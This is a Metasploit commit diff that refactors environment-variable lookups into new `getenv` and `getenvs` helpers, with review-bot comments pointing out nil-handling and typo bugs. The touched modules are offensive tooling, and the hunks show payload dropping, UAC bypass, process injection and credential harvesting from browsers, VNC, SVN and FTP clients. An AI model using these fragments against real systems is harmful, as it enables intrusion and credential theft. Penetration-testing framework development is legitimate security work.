Add getenvs, update getenv, change extract_path use

Stacks of modules were using `extract_path` where it wasn't really semantically correct
because this was the only way to expand environment variables. This commit fixes that
up a bit.

Also, I changed the existing `getenv` function in `stdapi` to `getenvs`, and had it
support the splat operator. I added a `getenv` function which is used just for a
single variable and uses `getenvs` behind the scenes.

The meterpreter console `getenv` command now uses `getenvs`
bug/bundler_fix
OJ 2013-12-19 11:43:59 +10:00
parent 8dfa2e6963
commit 9fb081cb2d
85 changed files with 179 additions and 168 deletions


@ -198,7 +198,7 @@ module ShadowCopy
tmpout = ''
session.response_timeout=120
begin
tmp = session.fs.file.expand_path("%TEMP%")
tmp = session.sys.config.getenv('TEMP')
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmiccmd}", nil, {'Hidden' => true})
sleep(2)
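Review bot: `tmp = session.sys.config.getenv('TEMP')` can now be nil, and the next line's `tmp + "\\"` would then raise NoMethodError, whereas the removed `expand_path("%TEMP%")` call returned a string. Going by the Config section of this commit, `getenv` is a plain hash lookup on the `getenvs` result, and that hash leaves out variables the remote side did not return. A guard such as `raise "TEMP is not set on the remote host" if tmp.nil?` keeps the failure readable. The same unchecked pattern recurs in later sections, for example `getenv('windir') << "\\system32\\win32k.sys"` and `env_vars['SYSTEMDRIVE'].strip`. The enclosing method starts and ends outside this hunk.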


@ -37,7 +37,7 @@ class Config
# Returns a hash of requested environment variables, along with their values.
# If a requested value doesn't exist in the response, then the value wasn't found.
#
def getenv(var_names)
def getenvs(*var_names)
request = Packet.create_request('stdapi_sys_config_getenv')
var_names.each do |v|
@ -56,6 +56,13 @@ class Config
return result
end
#
# Returns the value of a single requested environment variable name
#
def getenv(var_name)
getenvs(var_name)[var_name]
end
#
# Returns a hash of information about the remote computer.
#
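Review bot: The comment added above `getenv` does not say what a caller gets for a variable that is not set: `getenvs(var_name)[var_name]` yields nil in that case, where the `expand_path` calls replaced throughout this commit returned a string. The lookup also assumes the result hash is keyed by exactly the name that was passed in; whether that holds for differently cased requests such as 'windir' and 'WINDIR' depends on the part of `getenvs` that lies outside these hunks. I would extend the comment with `# Returns nil if the variable is not set on the remote host.` and note above `getenvs` that names are now given as separate arguments, since a caller that still passes an Array ends up iterating a nested array.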


@ -280,7 +280,7 @@ class Console::CommandDispatcher::Stdapi::Sys
end
def cmd_getenv(*args)
vars = client.sys.config.getenv(args)
vars = client.sys.config.getenvs(*args)
if vars.length == 0
print_error("None of the specified environment variables were found/set.")


@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
begin
wintemp = session.fs.file.expand_path("%TEMP%")
wintemp = session.sys.config.getenv('TEMP')
win_file = "#{wintemp}\\#{win_file}"
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
session.fs.file.rm(win_file)


@ -68,13 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
begin
wintemp = session.fs.file.expand_path("%TEMP%")
wintemp = session.sys.config.getenv('TEMP')
win_file = "#{wintemp}\\#{win_file}"
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
session.fs.file.rm(win_file)
@ -84,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Failed to delete #{win_file}")
false
end
end
end
end


@ -74,13 +74,11 @@ class Metasploit3 < Msf::Exploit::Remote
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.each do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
@dropped_files.each do |file|
win_file = file.gsub("/", "\\\\")
begin
wintemp = session.fs.file.expand_path("%WINDIR%")
wintemp = session.sys.config.getenv('WINDIR')
win_file = "#{wintemp}\\Temp\\#{win_file}"
# Meterpreter should do this automatically as part of
# fs.file.rm(). Until that has been implemented, remove the
@ -93,7 +91,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Failed to delete #{win_file}")
false
end
end
end
@ -169,4 +166,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
end


@ -72,13 +72,11 @@ class Metasploit3 < Msf::Exploit::Remote
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
begin
wintemp = session.fs.file.expand_path("%TEMP%")
wintemp = session.sys.config.getenv('TEMP')
win_file = "#{wintemp}\\#{win_file}"
# Meterpreter should do this automatically as part of
# fs.file.rm(). Until that has been implemented, remove the
@ -91,7 +89,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Failed to delete #{win_file}")
false
end
end
end
@ -184,4 +181,4 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
end


@ -66,13 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
begin
wintemp = session.fs.file.expand_path("%TEMP%")
wintemp = session.sys.config.getenv('TEMP')
win_file = "#{wintemp}\\#{win_file}"
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
session.fs.file.rm(win_file)
@ -82,7 +80,6 @@ class Metasploit3 < Msf::Exploit::Remote
print_error("Failed to delete #{win_file}")
false
end
end
end
end
@ -257,4 +254,4 @@ This code allows to launch other executables with user data provided as argument
solution because it allows to pass URL's as arguments. And code executed by mshta is on a privileged zone. Other
executables allow to provide SMB URI's but metasploit only allow to 'simulate' a SMB resource through webdav, so
the target should have the WebClient service enabled, which is only enabled by default on XP SP3.
=end
=end


@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
# Use the system path for executable to run except the wordpad
if client.sys.config.sysinfo["OS"] =~ /Windows XP/
windir = client.fs.file.expand_path("%ProgramFiles%")
windir = client.sys.config.getenv('ProgramFiles')
cmd="#{windir}\\Windows NT\\Accessories\\wordpad.exe"
else # Windows 2000
cmd = "notepad.exe"


@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
# Usint this solution atm because I'm experiencing problems with railgun when trying
# use GetTokenInformation
def low_integrity_level?
tmp_dir = expand_path("%TEMP%")
tmp_dir = session.sys.config.getenv('TEMP')
cd(tmp_dir)
new_dir = "#{rand_text_alpha(5)}"
begin


@ -137,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Local
if datastore["WritableDir"] and not datastore["WritableDir"].empty?
temp_dir = datastore["WritableDir"]
else
temp_dir = expand_path("%TEMP%")
temp_dir = client.sys.config.getenv('TEMP')
end
print_status("Using #{temp_dir} to drop malicious DLL...")


@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Local
if datastore["PATH"]
payload_path = datastore["PATH"]
else
payload_path = session.fs.file.expand_path("%TEMP%")
payload_path = session.sys.config.getenv('TEMP')
end
cmd_location = "#{payload_path}\\#{payload_filename}"


@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Local
def runas_method
payload = generate_payload_exe
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
tmpdir = expand_path("%TEMP%")
tmpdir = session.sys.config.getenv('TEMP')
tempexe = tmpdir + "\\" + payload_filename
write_file(tempexe, payload)
print_status("Uploading payload: #{tempexe}")
@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Local
bpexe = ::File.join(path, "bypassuac-x86.exe")
end
tmpdir = expand_path("%TEMP%")
tmpdir = session.sys.config.getenv('TEMP')
cmd = "#{tmpdir}\\#{bypass_uac_filename} /c #{tmpdir}\\#{payload_filename}"
print_status("Uploading the bypass UAC executable to the filesystem...")


@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Local
# Build a random name for the share and directory
share_name = Rex::Text.rand_text_alphanumeric(8)
drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
drive = session.sys.config.getenv('SYSTEMDRIVE')
share_dir = "#{drive}\\#{share_name}"
# Create them


@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Local
cmd = datastore["CMD"] || nil
upload_fn = nil
tempdir = session.fs.file.expand_path("%TEMP%")
tempdir = session.sys.config.getenv('TEMP')
if not cmd
# Get the exe payload.
exe = generate_payload_exe
@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Local
# Create a new task to do our bidding, but make sure it doesn't run.
#
taskname ||= Rex::Text.rand_text_alphanumeric(8+rand(8))
sysdir = session.fs.file.expand_path("%SystemRoot%")
sysdir = session.sys.config.getenv('SystemRoot')
taskfile = "#{sysdir}\\system32\\tasks\\#{taskname}"
print_status("Creating task: #{taskname}")


@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Local
end
def low_integrity_level?
tmp_dir = expand_path("%USERPROFILE%")
tmp_dir = session.sys.config.getenv('USERPROFILE')
cd(tmp_dir)
new_dir = "#{rand_text_alpha(5)}"
begin
@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Local
if datastore['TECHNIQUE'] == 'FILE'
payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
begin
tmp_dir = expand_path("%TEMP%")
tmp_dir = session.sys.config.getenv('TEMP')
tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
cd(tmp_dir)
print_status("Trying to drop payload to #{tmp_dir}...")
@ -186,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Local
# Spawn low integrity cmd.exe
print_status("Spawning Low Integrity Cmd Prompt")
windir = client.fs.file.expand_path("%windir%")
windir = session.sys.config.getenv('windir')
li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
count = count_cmd_procs


@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Local
end
def create_proc
windir = expand_path("%windir%")
windir = session.sys.config.getenv('windir')
cmd = "#{windir}\\System32\\notepad.exe"
# run hidden
begin


@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Local
print_status("Launching notepad to host the exploit...")
windir = expand_path("%windir%")
windir = session.sys.config.getenv('windir')
cmd = "#{windir}\\SysWOW64\\notepad.exe"
process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)


@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Local
# Creates a temp notepad.exe to inject payload in to given the payload
# Returns process PID
def create_temp_proc()
windir = client.fs.file.expand_path("%windir%")
windir = client.sys.config.getenv('windir')
# Select path of executable to run depending the architecture
if @payload_arch.first== "x86" and client.platform =~ /x86/
cmd = "#{windir}\\System32\\notepad.exe"


@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Local
# Writes script to target host
def write_script_to_target(vbs,name)
tempdir = expand_path("%TEMP%")
tempdir = session.sys.config.getenv('TEMP')
if name == nil
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
else


@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Local
def check
os = sysinfo["OS"]
if os =~ /windows/i
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
file_path = session.sys.config.getenv('windir') << "\\system32\\win32k.sys"
major, minor, build, revision, branch = file_version(file_path)
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision}")


@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Local
# Returns path for XML and payload
def generate_path(rexename)
# Generate a path to write payload and XML
path = datastore['PATH'] || expand_path("%TEMP%")
path = datastore['PATH'] || session.sys.config.getenv('TEMP')
xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml"
rexe_path = "#{path}\\#{rexename}"
return xml_path,rexe_path


@ -59,8 +59,9 @@ class Metasploit3 < Msf::Exploit::Local
exe = Msf::Util::EXE.to_win32pe_service(session.framework, raw)
sysdir = session.fs.file.expand_path("%SystemRoot%")
tmpdir = session.fs.file.expand_path("%TEMP%")
dir_env = session.sys.config.getenvs('SystemRoot', 'TEMP')
sysdir = dir_env['SystemRoot']
tmpdir = dir_env['TEMP']
print_status("Meterpreter stager executable #{exe.length} bytes long being uploaded..")
begin
@ -122,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Local
moved = false
configed = false
#default path, but there should be an ImagePath registry key
source = session.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
source = "#{sysdir}\\system32\\#{serv}.exe"
#get path to exe; parse out quotes and arguments
sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
sourcemaybe = session.fs.file.expand_path(sourceorig)
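Review bot: `source = "#{sysdir}\\system32\\#{serv}.exe"` relies on the local `sysdir` that is assigned in the earlier hunk of this file (`sysdir = dir_env['SystemRoot']`), and the two hunks sit some sixty lines apart with no method boundary visible between them. If they belong to different methods this line raises NameError; in that case fetch the value where it is used, `source = "#{session.sys.config.getenv('SystemRoot')}\\system32\\#{serv}.exe"`, or pass it in as an argument. `sysdir` can also be nil when the variable is missing, which would quietly produce a path that begins with `\system32`.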


@ -190,7 +190,7 @@ Processor-Speed=#{processor_speed}
end
end
win_temp = client.fs.file.expand_path("%TEMP%")
win_temp = client.sys.config.getenv('TEMP')
win_file = "#{win_temp}\\#{payload_exe}"
print_status("Attempting to delete #{win_file} ...")
client.shell_command_token(%Q|attrib.exe -r #{win_file}|)


@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
begin
print_good("Deleting the VBS payload \"#{@var_vbs_name}.vbs\" ...")
windir = client.fs.file.expand_path("%WINDIR%")
windir = client.sys.config.getenv('WINDIR')
client.fs.file.rm("#{windir}\\system32\\" + @var_vbs_name + ".vbs")
print_good("Deleting the MOF file \"#{@var_mof_name}.mof\" ...")
cmd = "#{windir}\\system32\\attrib.exe -r " +


@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
begin
windir = session.fs.file.expand_path("%WINDIR%")
windir = session.sys.config.getenv('WINDIR')
win_file = "#{windir}\\system32\\#{win_file}"
# Meterpreter should do this automatically as part of
# fs.file.rm(). Until that has been implemented, remove the


@ -45,7 +45,7 @@ class Metasploit3 < Msf::Post
end
def exists_exe?(exe)
path = expand_path("$PATH")
path = session.sys.config.getenv("PATH")
if path.nil? or path.empty?
return false
end


@ -43,7 +43,7 @@ class Metasploit3 < Msf::Post
paths = enum_users_unix
when /win/
@platform = :windows
drive = session.fs.file.expand_path("%SystemDrive%")
drive = session.sys.config.getenv('SystemDrive')
os = session.sys.config.sysinfo['OS']
if os =~ /Windows 7|Vista|2008/
@ -265,7 +265,7 @@ class Metasploit3 < Msf::Post
def whoami
if @platform == :windows
session.fs.file.expand_path("%USERNAME%")
session.sys.config.getenv('USERNAME')
else
session.shell_command("whoami").chomp
end


@ -54,9 +54,8 @@ class Metasploit3 < Msf::Post
var_names << registry_enumvals("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment")
output = []
var_names.delete(nil)
var_names.flatten.uniq.sort.each do |v|
# Emulate the output of set and env, e.g. VAR=VALUE
output << "#{v}=#{session.fs.file.expand_path("\%#{v}\%")}"
session.sys.config.getenvs(*var_names.flatten.uniq.sort).each do |k, v|
output << "#{k}=#{v}"
end
@output = output.join("\n")
@ltype = "windows.environment"


@ -240,7 +240,7 @@ class Metasploit3 < Msf::Post
def whoami
if @platform == :windows
session.fs.file.expand_path("%USERNAME%")
session.sys.config.getenv('USERNAME')
else
session.shell_command("whoami").chomp
end


@ -262,7 +262,6 @@ class Metasploit3 < Msf::Post
def get_ff_and_loot_path
@paths = {}
check_paths = []
drive = expand_path("%SystemDrive%")
loot_file = Rex::Text::rand_text_alpha(6) + ".txt"
case @platform
@ -271,7 +270,9 @@ class Metasploit3 < Msf::Post
print_error("You need root privileges on this platform for DECRYPT option")
return false
end
tmpdir = expand_path("%TEMP%") + "\\"
env_vars = session.sys.config.getenvs('TEMP', 'SystemDrive')
tmpdir = env_vars['TEMP'] + "\\"
drive = env_vars['SystemDrive']
# this way allows for more independent use of meterpreter
# payload (32 and 64 bit) and cleaner code
check_paths << drive + '\\Program Files\\Mozilla Firefox\\'
@ -628,9 +629,9 @@ class Metasploit3 < Msf::Post
def whoami
if @platform == :windows
return session.fs.file.expand_path("%USERNAME%")
session.sys.config.getenv('USERNAME')
else
return session.shell_command("whoami").chomp
session.shell_command("whoami").chomp
end
end
end


@ -307,7 +307,7 @@ class Metasploit3 < Msf::Post
def whoami
if @platform == :windows
session.fs.file.expand_path("%USERNAME%")
session.sys.config.getenv('USERNAME')
else
session.shell_command("whoami").chomp
end


@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post
base = "/Users/#{user}/Library/Thunderbird/Profiles/"
when /win/
if session.type =~ /meterpreter/
user_profile = session.fs.file.expand_path("%APPDATA%")
user_profile = session.sys.config.getenv('APPDATA')
else
user_profile = cmd_exec("echo %APPDATA%").strip
end

View File

@ -176,7 +176,7 @@ EOS
ring0_code.gsub!('TPTP', [pid].pack('V'))
# Create the malicious Keyboard Layout file...
tmpdir = session.fs.file.expand_path("%TEMP%")
tmpdir = session.sys.config.getenv('TEMP')
fname = "p0wns.boom"
dllpath = "#{tmpdir}\\#{fname}"
fd = session.fs.file.new(dllpath, 'wb')


@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
paths = []
services = []
vuln = ""
@temp = session.fs.file.expand_path("%TEMP%")
@temp = session.sys.config.getenv('TEMP')
if init_railgun() == :error
return


@ -233,12 +233,14 @@ class Metasploit3 < Msf::Post
print_status("Searching BulletProof FTP Client installation directory...")
# BulletProof FTP Client 2.6 uses the installation dir to store bookmarks files
program_files_x86 = expand_path('%ProgramFiles(X86)%')
if not program_files_x86.empty? and program_files_x86 !~ /%ProgramFiles\(X86\)%/
program_files = program_files_x86 #x64
progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
progfilesx86 = prog_files_env['ProgramFiles(X86)']
if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
program_files = progfilesx86 # x64
else
program_files = expand_path('%ProgramFiles%') #x86
program_files = progfiles_env['ProgramFiles'] # x86
end
session.fs.dir.foreach(program_files) do |dir|
if dir =~ /BulletProof FTP Client/
vprint_status("BulletProof Installation directory found at #{program_files}\\#{dir}")
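Review bot: `progfilesx86 = prog_files_env['ProgramFiles(X86)']` reads a variable that is never assigned; the line above names it `progfiles_env`, so this raises NameError as soon as it runs. It should read `progfilesx86 = progfiles_env['ProgramFiles(X86)']`. Once that is fixed, `progfilesx86.empty?` raises on nil if `getenvs` leaves the key out of the hash on a 32-bit host (as its comment suggests), and the `!~ /%ProgramFiles\(X86\)%/` test has nothing left to match, so the condition can become `if not progfilesx86.blank?`. The later section whose comment mentions the Steam client carries the same three lines and needs the same change.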


@ -33,7 +33,7 @@ class Metasploit3 < Msf::Post
return
end
drive = session.fs.file.expand_path("%SystemDrive%")
drive = session.sys.config.getenv('SystemDrive')
case session.platform
when /win64/i
@progs = drive + '\\Program Files (x86)\\'
@ -360,6 +360,6 @@ class Metasploit3 < Msf::Post
end
def whoami
return session.fs.file.expand_path("%USERNAME%")
return session.sys.config.getenv('USERNAME')
end
end


@ -40,10 +40,12 @@ class Metasploit3 < Msf::Post
# Steam client is only 32 bit so we need to know what arch we are on so that we can use
# the correct program files folder.
# We will just use an x64 only defined env variable to check.
if not expand_path('%ProgramFiles(X86)%').empty? and expand_path('%ProgramFiles(X86)%') !~ /%ProgramFiles\(X86\)%/
progs = expand_path('%ProgramFiles(X86)%') #x64
progfiles_env = session.sys.config.getenvs('ProgramFiles(X86)', 'ProgramFiles')
progfilesx86 = prog_files_env['ProgramFiles(X86)']
if not progfilesx86.empty? and progfilesx86 !~ /%ProgramFiles\(X86\)%/
progs = progfilesx86 # x64
else
progs = expand_path('%ProgramFiles%') #x86
progs = progfiles_env['ProgramFiles'] # x86
end
path = progs + '\\Steam\\config'


@ -103,8 +103,7 @@ class Metasploit3 < Msf::Post
def get_config_files
# Determine if TortoiseSVN is installed and parse config files
savedpwds = 0
user_appdata = session.fs.file.expand_path("%APPDATA%")
path = user_appdata + '\\Subversion\\auth\\svn.simple\\'
path = session.fs.file.expand_path("%APPDATA%\\Subversion\\auth\\svn.simple\\")
print_status("Checking for configuration files in: #{path}")
begin


@ -107,7 +107,7 @@ class Metasploit3 < Msf::Post
end
def check_systemroot
winpath = expand_path("%SYSTEMROOT%")+'\\wcx_ftp.ini'
winpath = expand_path("%SYSTEMROOT%\\wcx_ftp.ini")
check_other(winpath)
end


@ -98,11 +98,15 @@ class Metasploit3 < Msf::Post
locations = []
#Checks
locations << {:name => 'UltraVNC',
:check_file => session.fs.file.expand_path("%PROGRAMFILES%")+'\\UltraVNC\\ultravnc.ini',
:pass_variable => 'passwd=',
:viewonly_variable => 'passwd2=',
:port_variable => 'PortNumber='}
progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)')
progfiles_env.each do |k, v|
next if v.blank?
locations << {:name => 'UltraVNC',
:check_file => "#{v}\\UltraVNC\\ultravnc.ini",
:pass_variable => 'passwd=',
:viewonly_variable => 'passwd2=',
:port_variable => 'PortNumber='}
end
locations << {:name => 'WinVNC3_HKLM',
:check_reg => 'HKLM\\Software\\ORL\\WinVNC3',


@ -237,7 +237,7 @@ class Metasploit3 < Msf::Post
def run
print_status("Looking for WinSCP.ini file storage...")
get_ini(client.fs.file.expand_path("%PROGRAMFILES%")+'\\WinSCP\\WinSCP.ini')
get_ini(client.fs.file.expand_path("%PROGRAMFILES%\\WinSCP\\WinSCP.ini"))
print_status("Looking for Registry Storage...")
get_reg()
print_status("Done!")


@ -53,7 +53,8 @@ class Metasploit3 < Msf::Post
user = session.sys.config.getuid
userpath = nil
useroffcpath = nil
sysdrv = session.fs.file.expand_path("%SystemDrive%")
env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
sysdrv = env_vars['SystemDrive']
if os =~ /Windows 7|Vista|2008/
userpath = sysdrv + "\\Users\\"
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
@ -76,7 +77,7 @@ class Metasploit3 < Msf::Post
userinfo = {}
end
else
uservar = session.fs.file.expand_path("%USERNAME%")
uservar = env_vars['USERNAME']
userinfo['username'] = uservar
userinfo['userpath'] = userpath + uservar + lnkpath
userinfo['useroffcpath'] = userpath + uservar + officelnkpath


@ -285,7 +285,8 @@ class Metasploit3 < Msf::Post
host = session.session_host
#Get Google Chrome user data path
sysdrive = expand_path("%SYSTEMDRIVE%").strip
env_vars = session.sys.config.getenvs('SYSTEMDRIVE', 'USERNAME')
sysdrive = env_vars['SYSTEMDRIVE'].strip
if directory?("#{sysdrive}\\Users")
@profiles_path = "#{sysdrive}/Users"
@data_path = "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
@ -310,7 +311,7 @@ class Metasploit3 < Msf::Post
else
uid = session.sys.config.getuid
print_status "Running as user '#{uid}'..."
usernames << expand_path("%USERNAME%").strip
usernames << env_vars['USERNAME'].strip
end
has_sqlite3 = true


@ -292,7 +292,7 @@ class Metasploit3 < Msf::Post
return results
end
windir = session.fs.file.expand_path("%windir%")
windir = session.sys.config.getenv('windir')
getfile = session.fs.file.search(windir + "\\system32\\drivers\\etc\\","services.*",recurse=true,timeout=-1)
data = nil
@ -332,7 +332,7 @@ class Metasploit3 < Msf::Post
elsif exist?(val_location + "\\my.cnf")
data = read_file(val_location + "\\my.cnf")
else
sysdriv=session.fs.file.expand_path("%SYSTEMDRIVE%")
sysdriv=session.sys.config.getenv('SYSTEMDRIVE')
getfile = session.fs.file.search(sysdriv + "\\","my.ini",recurse=true,timeout=-1)
getfile.each do |file|
if exist?("#{file['path']}\\#{file['name']}")


@ -55,7 +55,7 @@ class Metasploit3 < Msf::Post
def download_files(location, file_type)
sysdriv = client.fs.file.expand_path("%SYSTEMDRIVE%")
sysdriv = client.sys.config.getenv('SYSTEMDRIVE')
sysnfo = client.sys.config.sysinfo['OS']
profile_path_old = sysdriv + "\\Documents and Settings\\"
profile_path_new = sysdriv + "\\Users\\"


@ -257,7 +257,7 @@ class Metasploit3 < Msf::Post
xp_c = "\\Cookies\\index.dat"
h_paths = []
c_paths = []
base = session.fs.file.expand_path("%USERPROFILE%")
base = session.sys.config.getenv('USERPROFILE')
if host['OS'] =~ /(Windows 7|2008|Vista)/
h_paths << base + vist_h
h_paths << base + vist_hlow


@ -28,7 +28,8 @@ class Metasploit3 < Msf::Post
users = []
user = session.sys.config.getuid
path4users = ""
sysdrv = session.fs.file.expand_path("%SystemDrive%")
env_vars = session.sys.config.getenvs('SystemDrive', 'USERNAME')
sysdrv = env_vars['SystemDrive']
if os =~ /Windows 7|Vista|2008/
path4users = sysdrv + "\\Users\\"
@ -49,7 +50,7 @@ class Metasploit3 < Msf::Post
end
else
userinfo = {}
uservar = session.fs.file.expand_path("%USERNAME%")
uservar = env_vars['USERNAME']
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + profilepath
users << userinfo
@ -89,7 +90,7 @@ class Metasploit3 < Msf::Post
end
if powershell_version =~ /2./
print_status("Powershell Modules:")
powershell_module_path = session.fs.file.expand_path("%PSModulePath%")
powershell_module_path = session.sys.config.getenv('PSModulePath')
session.fs.dir.foreach(powershell_module_path) do |m|
next if m =~ /^(\.|\.\.)$/
print_status("\t#{m}")


@ -147,7 +147,7 @@ class Metasploit3 < Msf::Post
print_prefetch_key_value
print_timezone_key_values(key_value)
print_good("Current UTC Time: %s" % Time.now.utc)
sys_root = expand_path("%SYSTEMROOT%")
sys_root = session.sys.config.getenv('SYSTEMROOT')
full_path = sys_root + "\\Prefetch\\"
file_type = "*.pf"
print_status("Gathering information from remote system. This will take awhile..")


@ -115,7 +115,7 @@ class Metasploit3 < Msf::Post
# Initialize all 7 possible paths for the answer file
#
def init_paths
drive = session.fs.file.expand_path("%SystemDrive%")
drive = session.sys.config.getenv('SystemDrive')
files =
[


@ -60,7 +60,7 @@ class Metasploit3 < Msf::Post
tmpout = ''
session.response_timeout=120
begin
tmp = session.fs.file.expand_path("%TEMP%")
tmp = session.sys.config.getenv('TEMP')
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
print_status "running command wmic #{wmiccmd}"
r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmiccmd}", nil, {'Hidden' => true})


@ -76,9 +76,10 @@ class Metasploit3 < Msf::Post
url = datastore["URL"]
filename = datastore["FILENAME"] || url.split('/').last
download_path = session.fs.file.expand_path(datastore["DOWNLOAD_PATH"])
if download_path.nil? or download_path.empty?
path = session.fs.file.expand_path("%TEMP%")
env_vars = session.sys.config.getenvs(datastore['DOWNLOAD_PATH'], 'TEMP')
download_path = env_vars[datastore['DOWNLOAD_PATH']]
if download_path.blank?
path = env_vars['TEMP']
else
path = download_path
end
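Review bot: `getenvs(datastore['DOWNLOAD_PATH'], 'TEMP')` treats the DOWNLOAD_PATH option as the name of an environment variable, whereas the removed line handed it to `expand_path` as a path. A value such as `C:\Downloads` or `%TEMP%\out` will presumably not be found as a variable, `download_path.blank?` then becomes true, and the code falls back to TEMP without telling the operator that the option was ignored. Keeping `download_path = session.fs.file.expand_path(datastore['DOWNLOAD_PATH'])` for the option and using `session.sys.config.getenv('TEMP')` only for the fallback preserves the previous behaviour. The enclosing method starts and ends outside this hunk.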


@ -87,7 +87,7 @@ class Metasploit3 < Msf::Post
end
def create_pac(local_pac)
pac_file = expand_path("%APPDATA%") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
pac_file = session.sys.config.getenv("APPDATA") << "\\" << Rex::Text.rand_text_alpha((rand(8)+6)) << ".pac"
conf_pac = ""
if ::File.exists?(local_pac)


@ -159,7 +159,7 @@ class Metasploit3 < Msf::Post
# Creates a temp notepad.exe to inject payload in to given the payload
# Returns process PID
def create_temp_proc(pay)
windir = client.fs.file.expand_path("%windir%")
windir = client.sys.config.getenv('windir')
# Select path of executable to run depending the architecture
if pay.arch.join == "x86" and client.platform =~ /x86/
cmd = "#{windir}\\System32\\notepad.exe"


@ -250,7 +250,7 @@ class Metasploit3 < Msf::Post
# Function for writing script to target host
#-------------------------------------------------------------------------------
def write_script_to_target(vbs)
tempdir = session.fs.file.expand_path("%TEMP%")
tempdir = session.sys.config.getenv('TEMP')
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
fd = session.fs.file.new(tempvbs, "wb")
fd.write(vbs)
@ -352,7 +352,7 @@ class Metasploit3 < Msf::Post
# Function for writing executable to target host
#-------------------------------------------------------------------------------
def write_exe_to_target(vbs,rexename)
tempdir = session.fs.file.expand_path("%TEMP%")
tempdir = session.sys.config.getenv('TEMP')
tempvbs = tempdir + "\\" + rexename
fd = session.fs.file.new(tempvbs, "wb")
fd.write(vbs)


@ -46,7 +46,8 @@ class Metasploit3 < Msf::Post
else
print_status("Rpcap service found: #{serv['Name']}")
reg=registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\rpcapd","Start")
